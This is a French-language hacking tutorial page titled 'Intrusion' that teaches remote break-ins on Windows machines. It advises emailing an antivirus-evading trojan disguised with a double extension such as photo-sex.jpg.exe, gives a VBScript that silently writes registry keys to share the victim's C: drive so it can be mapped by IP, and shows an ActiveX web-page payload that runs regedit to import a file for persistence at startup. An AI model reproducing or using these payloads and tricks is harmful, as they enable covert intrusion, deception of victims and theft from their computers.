Accueil   |   Download   |   News   |   Forum   |   Archive   |   Livre d'or
      ALPHANET : Hardware et Hacking enfin réunis!!!  
Intrusion


.: Intrusion :.

Bon je vais parler de pas mal de techniques pour penetrer un ordinateur a distance, ce
genre de uto est assez rare sur le net, jamais très complets quoi...

/!\Troyen par mail/!\

Alors la premiere technique (et la vous allez me rire au nez) c'est d'envoyer un troyen ,
que vous avez confectionné avec amour pour qu'il soit indetectable par norton & cie,
par mail.Ok c vrai que ca marche pas a tout les coups mais si vous metez un truc
du style photo-sex.jpg.exe ca pourrait etre pas mal mais si vous voulez utilisez
cette technique allez voir cette page sur le social engineering.

/!\Partager son disc dur/!\

La deuxieme technique est d'envoyer un fake mail ou l'envoyer sur une page avec ce script
en vbs qui lui fera partager C: sans que la victime s'en rende compte (script pris
sur the hackademy).

Set WshShell = CreateObject("WScript.Shell")WshShell.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network
\LanMan\C$\Flags", 770, "REG_DWORD"
WshShell.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion
\Network \LanMan\C$\Parm1enc", 6837, "REG_BINARY"
WshShell.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion
\Network \LanMan\C$\Parm2enc", 0, "REG_BINARY"
WshShell.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion
\Network \LanMan\C$\Path", "C:\"
WshShell.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion
\Network \LanMan\C$\Remark", ""
WshShell.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion
\Network \LanMan\C$\Type", 0, "REG_DWORD"

Et pour y acceder faites clic droit sur le poste de travail (avec XP pro) connecter un lecteur
reseau et taper :

\\IP_de_la_victime\C$ et voila vous etes sur son ordi a son insu.

/!\Utiliser des failles ie et windows/!\

Bon ya vraiment beaucoup de technique alors je completerai cet article au fil du temps
mais on peut par exemple
faire ca sur une page web :

<object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object>
<script>
fs=new ActiveXObject('Scripting.FileSystemObject');
// donne accès au système de fichiers
wsh.Run('Regedit.exe -s kak.reg');
// le virus peut ainsi exécuter n'importe quel programme du disque dur, il crée un fichier
kak.reg et va l'intégrer à la base de registre pour pouvoir s'exécuter à chaque démarrage.
</script>

tout est dans la source no comment donc:)